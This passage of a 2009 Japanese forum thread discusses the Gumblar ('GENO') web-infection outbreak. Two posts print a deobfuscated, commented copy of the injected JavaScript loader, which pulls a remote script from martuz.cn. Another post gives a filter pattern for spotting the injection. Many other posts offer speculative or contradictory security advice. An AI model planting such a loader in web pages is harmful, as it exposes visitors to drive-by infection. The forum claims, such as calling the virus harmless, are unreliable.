573名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:28
>>558
涙拭けよ
574名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:33
火狐使い勝手悪い…でも我慢
575名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:35
442 名前: スカシタゴボウ(アラバマ州)[sage] 投稿日:2009年05月16日(土) 23:32:11.00 ID:hgwQOSJu
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) にUserAgent変えたら感染しないってマジ?
576名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:50
>>566
FlashもReaderも削除しろwこれなら完璧だ
577名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:54
>>556
相手がadobeの脆弱性を狙ってやっているが
他の脆弱性を隠し持ってないとも限らない
いつ何時その攻撃手法に変えるかわからない
578名無しさん@お腹いっぱい。:2009/05/16(土) 23:34:25
>>572
食らったWinマシンが更新して改ざんしちゃったんだろ?
579名無しさん@お腹いっぱい。:2009/05/16(土) 23:34:29
ああ、そういやFirefoxでもIE Tabとか入れてたら
IEエンジンで読み込む場合があるな
580名無しさん@お腹いっぱい。:2009/05/16(土) 23:34:29
ヌルポ
581名無しさん@お腹いっぱい。:2009/05/16(土) 23:34:41
デフォルトなら火狐が一番危ないよ
先読みするから
582名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:01
IEコンポでUAをFirefoxにしたらどうなるん?
583名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:13
>>555
いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。

Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。
584名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:14
昼から何か進化した?
585名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:23
FlashもReaderも削除したけどまだ不安だ
FlashもReaderも使わない亜種が出てくるかもしれない
586名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:24
>>548
どれも同じだよ。>>324
確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。
587名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:26
>>526
まーAdobeReaderはFirefoxからも開けるから関係ないんじゃね?
そもそもブラウザを直接狙うんじゃなくてそこから呼び出したAdobeReaderを使って感染してるみたいだし。

まさかFirefox使っておいてNoScript使ってなかったのかね
588名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:42
http://www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg
 ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。


これはひどいwww
589名無しさん@お腹いっぱい。:2009/05/16(土) 23:35:48
>>581
エンジンが違うから火狐は大丈夫と何度云えば・・・。

590名無しさん@お腹いっぱい。:2009/05/16(土) 23:36:03
>>551
<body>タグの直前だったら可能性が高い。
でもスパム対策でメアドとかを難読化してるサイトもあるから
その情報だけでは何とも言えん。
591名無しさん@お腹いっぱい。:2009/05/16(土) 23:36:08
>>571
サイト教えて。
592名無しさん@お腹いっぱい。:2009/05/16(土) 23:36:27
最新のADOBIでも危ないと聞いたんだがマジ?
593名無しさん@お腹いっぱい。:2009/05/16(土) 23:36:37
ウイルス感染サイトにウイルスとは別のスクリプト埋め込んで
サイトにアクセスしたPCをランダムにtelnet飛ばして感染拡大とか

ありえないか
594名無しさん@お腹いっぱい。:2009/05/16(土) 23:36:57
>>571
おいサイトくらい晒してけ
何のためにこのスレいんだよ
595名無しさん@お腹いっぱい。:2009/05/16(土) 23:38:15
>>577
アホかw他のところ付いてきてから言えよw
596名無しさん@お腹いっぱい。:2009/05/16(土) 23:38:20
>>593
日本語で話せよ
597名無しさん@お腹いっぱい。:2009/05/16(土) 23:38:25
> pdfファイルいくつか開けたからか?

本人も特定できてないんじゃないのか
598名無しさん@お腹いっぱい。:2009/05/16(土) 23:39:20
>>589
油断してんじゃねーよカス
インフルエンザだって変化したんだよ
599名無しさん@お腹いっぱい。:2009/05/16(土) 23:39:47
Gecko系ブラウザは大丈夫って事?
600名無しさん@お腹いっぱい。:2009/05/16(土) 23:40:25
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;

if(
   (u.indexOf("Chrome")<0)&&
   (u.indexOf("Win")>0)&&
   (u.indexOf("NT 6")<0)&&
   (document.cookie.indexOf("miek=1")<0)&&
   (typeof(zrvzts)!=typeof("A"))
){
   zrvzts="A";
   eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
   document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな
601名無しさん@お腹いっぱい。:2009/05/16(土) 23:40:25
だー、寝れない
だれか絶対に感染しない方法を確立してくれよ
602名無しさん@お腹いっぱい。:2009/05/16(土) 23:40:56
>>601
ネットに繋げない
これマジ最強
603名無しさん@お腹いっぱい。:2009/05/16(土) 23:41:22
>>601

PCをネットに接続しない。
604名無しさん@お腹いっぱい。:2009/05/16(土) 23:41:28
>>601
http://ja.wikipedia.org/wiki/Lynx_(%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6)
605名無しさん@お腹いっぱい。:2009/05/16(土) 23:41:58
>>595
www (これはワラでなくワールドワイドウェブだwww)
606名無しさん@お腹いっぱい。:2009/05/16(土) 23:42:00
>>563
安全だって言われても
MacにするとYahoo MovieやBiglobeの動画見られなくなるもん
607名無しさん@お腹いっぱい。:2009/05/16(土) 23:42:21
もうこれでいいんじゃないか?
症状を挙げといても該当しなけりゃ安心ってわけじゃないし。

予防:
Flash PlayerとAdobe Readerを最新版にする。
Adobe ReaderでJavaScriptを無効にする。
可能であればブラウザでもJavaScriptを無効にする。

感染の確認と対策:
複数の亜種が存在し、感染後にどのような症状が現れるかはわからない。
感染した可能性があれば再インストール推奨。
608名無しさん@お腹いっぱい。:2009/05/16(土) 23:42:42
当分自宅のPCはメールチェックと2chしか見ない
609名無しさん@お腹いっぱい。:2009/05/16(土) 23:42:46
まだ不確かな材料出していきがってる奴がいるのか
610名無しさん@お腹いっぱい。:2009/05/16(土) 23:42:48
adobe夕方アップデートしたけど又来てるよ

みんなもチェックすると良いよ

611名無しさん@お腹いっぱい。:2009/05/16(土) 23:43:06
Linuxなら兵器だよな?
612名無しさん@お腹いっぱい。:2009/05/16(土) 23:43:51
常々申し上げているとおり
FireFoxが安全なのは標的にならなかったからです。
他に安全な理由は一切ありません。
613名無しさん@お腹いっぱい。:2009/05/16(土) 23:43:52
Flash PlayerとAdobe Readerの最新版って今どれ?
614名無しさん@お腹いっぱい。:2009/05/16(土) 23:44:11
>>601
ネットカフェいけば感染し放題だぜ!
家電量販店でもいいぜ!
615名無しさん@お腹いっぱい。:2009/05/16(土) 23:44:40
>>612
ブロックしてくれるのもFirefoxだけだがな
616名無しさん@お腹いっぱい。:2009/05/16(土) 23:44:55
>>600
これだと、ChromeとNT 6以上を除外してるだけだな。
Firefoxも対象だ。
617名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:09
正直OPERAがダメだったのに狐だけが安全って気はしないんだけどどうなんだろ
今はPS3からなんでコレはいくらなんでも安全だろうがな

PDF開けんからなw
2kだといろいろあって再インスコが気が遠くなるな
不愉快だがビスタ買おうかしら
618名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:16
>>600
Chromeは感染対象から外れてたのか
619名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:20
>>615
え?
620名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:28
>>610
flash playerのほうか?
621名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:46
Google Chromeは?
622名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:57
>>617
ちょっとPS3買ってくるわ
623名無しさん@お腹いっぱい。:2009/05/16(土) 23:45:57
624名無しさん@お腹いっぱい。:2009/05/16(土) 23:46:09 BE:2114127195-PLT(12500)
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/

>不正なソフトウェアをホストしていたかどうか
>はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。sangsangmadang.com/, wz114.com/, futuraproject.cz/ を含む 10168 個のドメインを感染させています。


10168個のドメイン・・・だと?
625名無しさん@お腹いっぱい。:2009/05/16(土) 23:46:18
>>613
ここの情報を基にしたり、ここで聞いたりするより、Adobeのサイト行って調べた方が確実だと思われ
626名無しさん@お腹いっぱい。:2009/05/16(土) 23:46:24
>>600
埋め込まれるスクリプトも進化してるんだな。これだとFirefoxも危険だ。
627名無しさん@お腹いっぱい。:2009/05/16(土) 23:46:28
>>622
つ ドリームキャスト
628名無しさん@お腹いっぱい。:2009/05/16(土) 23:46:39
このスレ5人ぐらいで回してるの?
629名無しさん@お腹いっぱい。:2009/05/16(土) 23:47:02
また中国か
630名無しさん@お腹いっぱい。:2009/05/16(土) 23:47:22
>>600
今いちばん安全なのはChromeってことか。
631名無しさん@お腹いっぱい。:2009/05/16(土) 23:47:24
>>501>>514>>518
Sleipnir → Firefox3 移行推進計画
ttp://ktrue.blog.shinobi.jp/Entry/387/

ここに書かれてるの片っ端から入れたら楽に乗り換えられた
今じゃアドオン探しに夢中だわ
632名無しさん@お腹いっぱい。:2009/05/16(土) 23:47:27
>>628
ここには俺とお前しかしないよ
633名無しさん@お腹いっぱい。:2009/05/16(土) 23:47:53
vistでsqlsodbc.chmファイルが3つ出てくるんだが・・
あと二つのサイズが50,004 バイト、48,663 バイト
オワタ・・?
634名無しさん@お腹いっぱい。:2009/05/16(土) 23:48:24
>>630
一番安全なのはマックに決まってるだろ
635名無しさん@お腹いっぱい。:2009/05/16(土) 23:48:24
636名無しさん@お腹いっぱい。:2009/05/16(土) 23:48:28
>>632
2人だけか
637名無しさん@お腹いっぱい。:2009/05/16(土) 23:48:32
みんなスクリプトだよ
638名無しさん@お腹いっぱい。:2009/05/16(土) 23:48:35
>>629
実際には中国じゃないよ
639名無しさん@お腹いっぱい。:2009/05/16(土) 23:48:47
IE→危険
火狐→危険水域に達しつつある?

くらいのキモチでいればOK?
640名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:00
内部破壊するわけでもないし
FWで十分なのになんで騒いでるんだろ・・
ここのトピの人達って情弱?
641名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:00
>>633
Vistaならそれは普通
642名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:01
ウィルス作った奴誰だよ
俺の貴重なホリデイをブッ潰しやがって
許せねぇ
643名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:34
>>634
常々申し上げているとおり
Macが安全なのはry
644名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:38
>>635
知ってたか、それGoogleの機能なんだぜ
645名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:48
感染したらどうなんの?
646名無しさん@お腹いっぱい。:2009/05/16(土) 23:49:55
オレはグーグル クロムで勝ち組だわw
647名無しさん@お腹いっぱい。:2009/05/16(土) 23:50:12
Seamonkeyもやばいの?
648名無しさん@お腹いっぱい。:2009/05/16(土) 23:50:43
>>644
うん知ってるよ
で?他のブラウザは?
649名無しさん@お腹いっぱい。:2009/05/16(土) 23:50:43
>>639
特に区別無くどちらも対象にされてるからどっちが安全とか無いよ
今でこそ判定文付けてるけど、そのうち全ての環境で感染できるか試すようになるかもね
650名無しさん@お腹いっぱい。:2009/05/16(土) 23:51:15
>>640
お前の自慢のFWで>>324を全部踏んできてもらおうか
651名無しさん@お腹いっぱい。:2009/05/16(土) 23:51:37
>>649
ここ数日見てると何かそれくせえ。
652名無しさん@お腹いっぱい。:2009/05/16(土) 23:51:38
JavaScript切ったら、Google先生の検索結果に出てた
安全サイト確認ロゴも消えてしまった
653名無しさん@お腹いっぱい。:2009/05/16(土) 23:51:59
>>650
全部踏んできたお
654名無しさん@お腹いっぱい。:2009/05/16(土) 23:52:14
バージョンに関してはまとめとかに書いといてもしょうがないんだよな。
いつ更新されるかわからないんだし。
655名無しさん@お腹いっぱい。:2009/05/16(土) 23:52:19 BE:1503380148-PLT(12500)
ドメイン的に発信源は中国と思ってたんだけど
中国じゃないの?
ちなみにgumblar.cnはもう死んでるからいまさらこのドメインブロックしても意味ないんだよね
656名無しさん@お腹いっぱい。:2009/05/16(土) 23:52:22
なんだなんだ
結局GoogleChromeが最強のブラウザ決定?
657名無しさん@お腹いっぱい。:2009/05/16(土) 23:52:32
>>631
参考にしてみる
ありがとう
658名無しさん@お腹いっぱい。:2009/05/16(土) 23:52:34
>>645
ほかの人うつす可能性があるだけで事実上無害
気にするだけ損なウィルス
659名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:03
>>641
おお、そうなのか。複数出てくるのは普通なのか。
サイズが違うのはやっぱりまずい?
660名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:25
>>656
Netscape
661名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:37
>>655
gumblar.cnの設置場所はロシアだけど、犯人(グループ)がどこにいるかは
わからんね。
662名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:42
Vista用のテンプレもなかったっけ?
どこいった?
663名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:43
>>650
同じくFWだけで踏んできたが何か?
664名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:55
>>655
別にドメインが中国でも実際に使ってるのは中国人じゃない可能性はあるだろ
665名無しさん@お腹いっぱい。:2009/05/16(土) 23:53:57
>>658
豚インフルに似てるな
666名無しさん@お腹いっぱい。:2009/05/16(土) 23:54:08
いつ攻撃法をJavaScriptからActiveXへ変えるのだろうか
667名無しさん@お腹いっぱい。:2009/05/16(土) 23:54:16
サイト側が感染する時って
どういう仕組みで感染するんですか?
668名無しさん@お腹いっぱい。:2009/05/16(土) 23:54:23
知ってる範囲で感染サイトまとめくれ
ν速じゃ4Gamerとか痛いニュースやYourFilehostが感染だの憶測が飛びまくってて分からん
669名無しさん@お腹いっぱい。:2009/05/16(土) 23:54:31
いつになったらおさまるのだろうか
対策はしているがまた亜種が出てきたらどうしようかとか色々考えてしまう
670名無しさん@お腹いっぱい。:2009/05/16(土) 23:55:31
>>667
スクリプト踏んで感染したPCからftpパスワードを抜かれる
671名無しさん@お腹いっぱい。:2009/05/16(土) 23:55:52
最新の検体だとF-Secureひっかからないのか…
とりあえずSASに記録しとくか…
672名無しさん@お腹いっぱい。:2009/05/16(土) 23:56:33
ノートンじゃ反応しないらしいからオンラインスキャンしたいんだけどどこ使えばいいのか
673名無しさん@お腹いっぱい。:2009/05/16(土) 23:57:05
火スペ!
674名無しさん@お腹いっぱい。:2009/05/16(土) 23:57:10
>>658
え・・・?
675名無しさん@お腹いっぱい。:2009/05/16(土) 23:57:26
>>658
* コマンドプロンプトを実行中ではないのにcmd.exeが起動している
* cmdやregeditが起動しない(Explorerが落ちる)
* 特定のサイトに接続できなくなる
* ブラウジングがまともにできない
* Adobeが5分に1回のペースで更新を要求してくる
* CPUの稼働率が何も作業していないのに50%近くに上がる(CPUのコア数によって違う)

こんな症状が報告されてるがな

愚痴。
判りもしないで騒ぐなって馬鹿いるけど、だったらウイルスの挙動を完全に解析してくれ。
それができない・亜種が発生し続けてるから何されるか完全に把握できないってのに。
676名無しさん@お腹いっぱい。:2009/05/16(土) 23:57:26
>>648
Chromeにはあるんじゃね?
677名無しさん@お腹いっぱい。:2009/05/16(土) 23:57:54
678名無しさん@お腹いっぱい。:2009/05/16(土) 23:58:06
fc2ブログ見れなくなった…
俺だけでしょうか?
679名無しさん@お腹いっぱい。:2009/05/16(土) 23:58:24
http://search.chiebukuro.yahoo.co.jp/search/search.php?flg=3&p=eval+unescape
HTMLにいつのまにか謎の文字列が挿入されています。 ...2fsc:72ipt:3e:22):3b:7d';
var Mdpko=FPCN.replace(Y3n5P,MRfH);eval(unescape(Mdpko))})(/:/g); --></script>
ヨミサーチを設置後、htmlソースがおかしくなりました。 スクリプト記述部が
<script language=javascript><!-- (function(t){eval(unescape


感染広がりまくりwwwwwうぇwwwwwww
680名無しさん@お腹いっぱい。:2009/05/16(土) 23:58:32
var j = "", u = navigator.userAgent;

if(
     (u.indexOf("Chrome")<0) &&      //Chrome以外ならtrue
     (u.indexOf("Win")>0) &&        //Windowsならtrue
     (u.indexOf("NT 6")<0) &&       //WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
     (document.cookie.indexOf("miek=1")<0) &&
     (typeof(zrvzts)!=typeof("A"))
){
     zrvzts="A";
     if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
          j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列(詳しくはググれ)
     }
     document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね
681名無しさん@お腹いっぱい。:2009/05/16(土) 23:58:33
一週間くらいでワクチン対応くるかな
682名無しさん@お腹いっぱい。:2009/05/16(土) 23:58:37
>>672
オンラインスキャンでも最新亜種は検出しないよ。
検体を提出してもクリーン判定されちゃうもの。
683名無しさん@お腹いっぱい。:2009/05/17(日) 00:00:19
>>672カスぺとかじゃない…
なんかもうどのソフトも後手後手だから、予防対策とっておとなしくしてるわ…
亜種出まくりだし。
なんか変な感じするなぁ。
684名無しさん@お腹いっぱい。:2009/05/17(日) 00:01:00

恐らくワクチンが出来るまでに>>681はあぼーんする可能性99.8%
685名無しさん@お腹いっぱい。:2009/05/17(日) 00:01:00
>>675
UPX解凍しても中身が全部見えない
u.batの挙動は海外サイトで纏められてるが、残念ながら不明
686名無しさん@お腹いっぱい。:2009/05/17(日) 00:01:01
夜になって急に騒がしくなってきたな
687名無しさん@お腹いっぱい。:2009/05/17(日) 00:01:18 BE:1127535146-PLT(12500)
>>664
中国人が発信源じゃなくて、中国が発信源と思ってたの
688名無しさん@お腹いっぱい。:2009/05/17(日) 00:01:30
コキントーとかの私用パソコンが感染したらどうなるんだろか?

犯人が中国人だったら死刑だろーなw
689名無しさん@お腹いっぱい。:2009/05/17(日) 00:01:54
そりゃまあ対策ソフトなんだし先手はありえんな
690名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:10
OperaでJS、Java、FlashとReaderのプラグインを切る、これ最強
691名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:13
>>675
亜種っていっても、FlashとPDFの脆弱性を利用しているという点ではずっと一貫してると思うんだが。
だから呼びかけられてる予防方法はずっと変わってないだろ。

つーかそこに挙がってる症状は、とりあえず感染の目安になるってだけじゃないのか。
問題はトロイを仕込まれるってとこなんじゃないか?
692名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:31
少なくともGENOで確認されて一月経過してて、他所ではもっと前から感染してるのに、
一向に対策が進まない現状
693名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:36
もうわけわからん
694名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:37
これ外国でも騒ぎになってるのか?
695名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:38
UACの偉大さ
696名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:52
>>675
とくに深刻な症状でもないね
気にするだけ無駄ってのが正解かも
キンタマで人生終わるとかじゃないからw
697名無しさん@お腹いっぱい。:2009/05/17(日) 00:02:54
fc2はfc2ブログだけじゃなく、fc2.comも開けなくなってるな。
fc2.comの管理者が食らってメンテ中か?
698名無しさん@お腹いっぱい。:2009/05/17(日) 00:03:06
>>680
違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。
699名無しさん@お腹いっぱい。:2009/05/17(日) 00:03:17
>>687
http://www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg
 ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。
700名無しさん@お腹いっぱい。:2009/05/17(日) 00:03:40
>>635
IE8でも、検索サイトをGoogleに設定しているとそうなるらしいけど、
俺は怖くて試していない
701名無しさん@お腹いっぱい。:2009/05/17(日) 00:03:44
>>678
同人板でも話題になってた
いつものことなのかそうでないのかの判断がつかない状況
702名無しさん@お腹いっぱい。:2009/05/17(日) 00:04:00
なんか火消しに奔走する奴が出始めたな
どこかの関係者か?
703名無しさん@お腹いっぱい。:2009/05/17(日) 00:04:19
ソースチェッカーオンラインが「アクセス規制中です 現在、大規模な攻撃を受けており」だってさ
同人板の連中が殺到してんだな・・・乙
704名無しさん@お腹いっぱい。:2009/05/17(日) 00:04:53
そもそも犯人の目的は何なんだ?
705名無しさん@お腹いっぱい。:2009/05/17(日) 00:05:12
>>704
おまいのアナル
706名無しさん@お腹いっぱい。:2009/05/17(日) 00:05:12
GENOの人居るんでしょ?
ちゃんと責任取ってよね
キャッシュ消せば大丈夫とかよくも大嘘こいてくれたな
707名無しさん@お腹いっぱい。:2009/05/17(日) 00:05:41
>>704
Vistaの普及
708名無しさん@お腹いっぱい。:2009/05/17(日) 00:05:47
ブルスク気にしないのか
709名無しさん@お腹いっぱい。:2009/05/17(日) 00:05:48
genoはどんどん名が売れていくな
よかったじゃんw
710名無しさん@お腹いっぱい。:2009/05/17(日) 00:05:52
とにかくjs切ってサイト閲覧してれば大丈夫ってことだよね?
711名無しさん@お腹いっぱい。:2009/05/17(日) 00:06:01
>>704
目的の一つはアフィ。
検索結果のリンク先を書き換えるらしい。
712名無しさん@お腹いっぱい。:2009/05/17(日) 00:06:10
同人同人騒いでるのってあの人でしょ
713名無しさん@お腹いっぱい。:2009/05/17(日) 00:06:14
結局vistaなら大丈夫なの?
714名無しさん@お腹いっぱい。:2009/05/17(日) 00:06:45
>>707
俺すでにびすたんだよ
715名無しさん@お腹いっぱい。:2009/05/17(日) 00:06:59
>>695
この間仕方なしにVistaに変えたけどそれオンにしていたら
どんな警告出るの?
716名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:34
>>710
今のところはね。
いつまでもjavascriptだけとは思えないけどね。
javascriptのバージョン判定部分なんかも書き方変わってきてるし。
717名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:35
>>696
ゾンビになって犯罪に加担することになります
ある日警察がきます
718名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:40
>>704
大規模なボットネットを手に入れるためじゃない
その手の世界では結構な高額で売れるんだとか

GENOウイルス自体は感染を広める為だけの物だから解釈によっては無害とか言うことも可能なんだろう
でもゾンビ化してるから後から遠隔操作で何されるかはわからん
719名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:44
>>706
          /)              □
           ///)      □
          /,.=゙''"/            □
   /     i f ,.r='"-‐'つ____   角砂糖3個やろう
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
720名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:47
>>711
もしそうなら(相手が大規模な詐欺グループでないなら)簡単に身元割れるんじゃね?
721名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:47
chromeも>>635みたいに弾いてくれるのか?

chromeはjs不許可にできないから試せない・・
722名無しさん@お腹いっぱい。:2009/05/17(日) 00:07:55
>>713
UAC切ってるならXP同様感染する
723名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:09
とうぶんフラッシュは見ないことにしようと思ったんだが、
よく考えるとおとついadobeのフラッシュプレーヤー更新したとき以外
ここんとこ全然見る機会なかったわ。

捨ててもいい気がしてきたw
724名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:25
いやもうGENO潰れろよ
恨みを一身に背負ってさ
725名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:30
>>704
botnetのゾンビ集め

で、そのnetを時間貸しでレンタルして金稼ぎ、らしい
726名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:34
47 名前:GENO[] 投稿日:2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ
727名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:37
ノートン先生まだ寝てるんだぜ?
728名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:38
感染サイトまとめとかないの?
729名無しさん@お腹いっぱい。:2009/05/17(日) 00:08:50
UACって何
730名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:05
>>689
○○最強!なーんて言ってる場合じゃないなって…
>>691
進まないな…不便になるのが嫌なのは分かるけどさ…
仕事で諸々をアップデート出来ないって人は大変だ。
731名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:29
>>726
それ確定情報ねーだろ
732名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:32
>>691
そうだよ、だから

簡潔に>>530だけを>>1に書いとけばいいだけ

馬鹿がテンプ色々付加するから混乱するんだよな

理解しきれてないから長文でしか説明できない馬鹿がスレタテるとこうなる。

ちなみに>>530はおれが書いた
733名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:33
故意にデマを広めると検挙されるケースもあるから注意な
734名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:45
Scriptからの挙動による対策
・ Google Chromeを使う
・ Windows以外のOSを使う
・ Windows Vista以降のOSを使う
・ cookieをオフにする
・ JavaScriptをオフにする
・ Adobe Readerを使わない

これのどれかを行えば今のところ感染しない
735名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:46
>>722
少なくとも現時点で明らかになっているスクリプトではVistaとChromeは
除外してるよ。
736名無しさん@お腹いっぱい。:2009/05/17(日) 00:09:48
>>723
動画サイトいかないならおkじゃね
737名無しさん@お腹いっぱい。:2009/05/17(日) 00:10:10
>>716
サンクス。
Geno騒動初期に手に入れたオミトロンのフィルタが
機能するかどうか試したんだけど、アラートはでなかった。
JsOffでも機能するよね?

[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"
738名無しさん@お腹いっぱい。:2009/05/17(日) 00:10:22
中華のサイバーテロ演習
739名無しさん@お腹いっぱい。:2009/05/17(日) 00:10:24
>>732
ゆとり乙
火消しのつもりか?
740名無しさん@お腹いっぱい。:2009/05/17(日) 00:10:27
とにかく家族や他人様に迷惑かけないように
ネットを切って働いて自立するべきだな
741名無しさん@お腹いっぱい。:2009/05/17(日) 00:10:57
>>740
夜勤は来週からだ
742名無しさん@お腹いっぱい。:2009/05/17(日) 00:11:00
>>728
ネットしなけりゃOK
743名無しさん@お腹いっぱい。:2009/05/17(日) 00:11:11
あと、プニルで見たんだが、ちゃんとGoogleからの警告があったよ。
IE8でも警告されると思うが、念のためjs切ってみたほうがいい。
744名無しさん@お腹いっぱい。:2009/05/17(日) 00:11:33
Vista使ってて初めて良かったと思った
745名無しさん@お腹いっぱい。:2009/05/17(日) 00:11:34
GENOの対応はたしかに酷いが、ここまで広がってるのはもうGENO関係ないと思うぞ。
どっちかっていうとアップデートしてない人がこんなにいるのかって驚き。
746名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:01
>>737
document.writeの直後、unescapeのパターン以外にもいくつかあるよ。
747名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:06
amazonが感染したとかどっかで見たけど流石にデマだよなー
748名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:08
>>740
お願いだからお仕事休んでね!って会社が言うんだよお
749名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:30
>>734
Cookieは関係ないです、勘違いだった。
750名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:31
>>745
関係なくはない
小林みたいにしっかりと「ウィルスでしたごめんなさい」とすぐに書けば
感染した奴もすぐ対応できた
751名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:34
>>739

なんのための火消し?

中傷は反論じゃないですよ。

具体的にどうぞ。
752名無しさん@お腹いっぱい。:2009/05/17(日) 00:12:42
>>743
ドメイン変わってスルーされてるって話だけど、どうかな
753名無しさん@お腹いっぱい。:2009/05/17(日) 00:13:06
47 名前:GENO[] 投稿日:2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ


これって本当?
754名無しさん@お腹いっぱい。:2009/05/17(日) 00:13:24
こんなの全然問題じゃねえだろ!って情弱が逆切れし始めてんな。
PCにどれだけ飼ってるのか興味深い
755名無しさん@お腹いっぱい。:2009/05/17(日) 00:13:33
http://www.kingsoft.jp/
ここも感染した?
756名無しさん@お腹いっぱい。:2009/05/17(日) 00:13:37
>>743
googleから検索して開けばブロックされるに決まってるだろアホか
問題なのは普段見ているサイトが感染したとしてブックマークとかから直接アクセスした場合
firefoxはgoogleのDBから随時リストを更新している
chromeはどうなんだ
757名無しさん@お腹いっぱい。:2009/05/17(日) 00:14:11
>>755
お前もういい加減にしろ
758名無しさん@お腹いっぱい。:2009/05/17(日) 00:14:16
>>752
Googleが危険判定したら別ドメインに逃げてるっぽいよな。
